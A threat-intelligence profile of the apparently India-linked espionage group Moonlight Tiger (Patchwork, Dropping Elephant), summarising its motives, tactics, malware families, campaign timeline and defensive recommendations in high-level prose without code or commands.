Introduction
Moonlight Tiger, also known as APT-C-09, Patchwork, Dropping Elephant, and Monsoon, is a suspected Indian cyber-espionage group that has been active since at least 2015. This group consistently targets foreign policy, defense, and academic institutions across South and East Asia. This pattern suggests sophisticated intelligence gathering aligned with India’s strategic and geopolitical goals.
Unlike disruptors or financially motivated individuals, Moonlight Tiger operates like a state-affiliated espionage cell. Its campaigns include well-designed phishing schemes, politically themed traps, and custom backdoors mixed with public tools. Over nearly a decade, the group has quietly advanced from basic document attacks to multi-stage operations using cloud services, modular implants, and living-off-the-land techniques.
Identity and Motivation
Analysts largely believe that Moonlight Tiger consists of actors based in India or linked to Indian strategic interests. The group appears to enhance intelligence-gathering that supports traditional human intelligence efforts. Its operational focus reflects India’s geopolitical issues, such as countering China and Pakistan and tracking developments in South Asian defense and policy.
The group’s main motivations include:
1. Geopolitical Intelligence: Gathering strategic information from regional adversaries like China and Pakistan.
2. Defense and Policy Surveillance: Monitoring changes in defense procurement, military evolution, and foreign policy think tanks.
3. Regional Influence Operations: Observing diplomatic, academic, and research institutions that shape narratives around South Asian security.
Moonlight Tiger’s operations often show opportunism paired with precision, aligning with significant policy events, bilateral meetings, or military exercises involving Indian interests.
Tactics, Techniques, and Procedures (TTPs)
The group uses a mix of social engineering, malware development, and open-source tools to gain access to networks and maintain presence.
1. Initial Access
The primary way the group gets in is through spearphishing. Emails often impersonate trusted government, defense, or academic contacts. Attached documents exploit vulnerabilities in Microsoft Office (e.g., CVE-2017-0199, CVE-2018-0802) or use embedded macros to run PowerShell scripts. At the same time, Moonlight Tiger launches watering-hole attacks on websites visited by defense analysts and policy researchers.
2. Execution and Persistence
After gaining access, the group maintains its presence through registry changes, scheduled tasks, and DLL side-loading. It often uses custom droppers that imitate legitimate Indian government or research files. Many of these droppers release malware like BADNEWS, Ragnatela, or open-source implants (Meterpreter, QuasarRAT) that are designed for stealth and flexibility.
3. Command and Control (C2)
Moonlight Tiger’s C2 setup relies heavily on HTTP/S communication channels hosted on compromised servers. The group prefers cloud-based platforms and public hosting providers for C2 staging, encrypting its traffic using SSL to avoid detection. PowerShell and Python scripts are frequently employed for dynamic payload delivery and data theft.
4. Malware and Tools
The group’s custom toolkit combines unique and publicly available components:
– BADNEWS: A longstanding backdoor that allows file theft and command execution.
– Ragnatela: A modular RAT that includes anti-analysis features and encrypted C2 communication.
– Meterpreter / QuasarRAT: Modified open-source tools for discreet remote access.
– Java-based Implants: Occasionally used to target cross-platform environments in diplomatic and research networks.
5. Exfiltration and Lateral Movement
Moonlight Tiger uses legitimate cloud services and temporary file-sharing platforms for data theft. Credentials stolen through phishing are often reused to move within target environments. The group also uses batch scripts and PowerShell-based tools to scout valuable systems.
Notable Operations
Moonlight Tiger’s campaigns highlight its long-term commitment to espionage and information dominance in South Asia.
2016 – Dropping Elephant Campaign: One of the first publicly documented operations, targeting Chinese diplomatic and media organizations with harmful RTF documents. This marked the group’s entry into the wider APT field.
2018 – Patchwork Expansion: Focused on Pakistani defense and foreign affairs bodies. Introduced the BADNEWS RAT, delivered through phishing emails disguised as academic research papers.
2020 – Operation Monsoon: Expanded into Southeast Asia, using modular PowerShell scripts within fake Office templates related to defense cooperation.
2023 – Orange Athos Campaign: Used watering-hole attacks on South Asian think tanks, infecting visitors with the Ragnatela backdoor. This operation showed better infrastructure management and encryption.
2025 – Strategic Research Phishing Campaign: Targeted Chinese and Sri Lankan defense research centers with fake conference invitations and policy-themed traps. Analysts noted enhanced operational security, including rotating domains and PowerShell obfuscation.
Each campaign highlights the group’s ability to adapt to new technologies and geopolitical shifts, ensuring its relevance in a competitive regional cyber environment.
Evolution and Organizational Behavior
Moonlight Tiger’s technical maturity has advanced significantly since its initial appearances. The group’s growth mirrors the broader sophistication of India’s emerging cyber capabilities. Early operations depended on basic document exploits and simple RATs, while later campaigns included modular loaders, cloud infrastructure, and encrypted communications.
Recent intelligence indicates that the group may share infrastructure or resources with other Indian-linked entities, such as SideWinder or Confucius, though each has distinct tools and targeting patterns. This potential overlap suggests a semi-federated network of Indian APTs working towards loosely aligned intelligence goals.
The group’s evolution can be divided into three phases:
2015–2017: Basic spearphishing and static malware (Dropping Elephant phase).
2018–2021: Shift to modular RATs and more organized infrastructure (Patchwork phase).
2022–2025: Incorporation of living-off-the-land and cloud-based tactics, showing operational maturity ( Moonlight Tiger phase).
Strategic Impact
Moonlight Tiger’s ongoing espionage efforts illustrate India’s growing involvement in state-level cyber operations. While it is less visible than Chinese or Russian APTs, the group maintains a consistent, intelligence-driven approach focused on achieving strategic advantage through information superiority.
The effects of its operations reach beyond data theft:
– Geopolitical Leverage: Intelligence gathered from regional adversaries aids policy planning and diplomatic strategy.
– Technological Surveillance: Monitoring defense upgrades and military-industrial projects provides early warning capabilities.
– Regional Influence: Disruption or exposure of foreign narratives via targeted leaks or influence campaigns.
Moonlight Tiger’s focus on soft-power targets—universities, policy institutes, and NGOs—shows a deep understanding of information ecosystems in today’s era of hybrid warfare.
Defensive Takeaways
1. Phishing Awareness: Provide solid training and multi-factor authentication to reduce credential theft.
2. Network Segmentation: Stop lateral movement through internal isolation and continuous privilege checks.
3. Behavioral Detection: Use endpoint detection and response tools to spot unusual PowerShell or network activity.
4. Threat Intelligence Sharing: Regional cooperation among CERTs in Asia can help identify overlaps in Moonlight Tiger’s infrastructure.
5. Cloud Security Monitoring: Keep an eye on unusual outbound traffic to cloud platforms, which is a known theft vector for the group.
Conclusion
Moonlight Tiger (APT-C-09) represents the evolution of India’s cyber-espionage landscape methodical, adaptable, and geopolitically focused. Its operations show an intelligence service increasingly skilled at merging traditional espionage goals with modern cyber strategies. By combining the precision of spearphishing with modular malware design, the group continues to infiltrate sensitive networks across Asia with relative stealth.
As of 2025, Moonlight Tiger remains active and evolving. Its path suggests ongoing investment in cyber capabilities aimed at securing India’s regional strategic dominance. For defenders and policymakers, the group serves as a reminder that the future of espionage is no longer limited to embassies and boardrooms but occurs within the unseen circuits of cyberspace.
You can download and review the sheet for all the details!
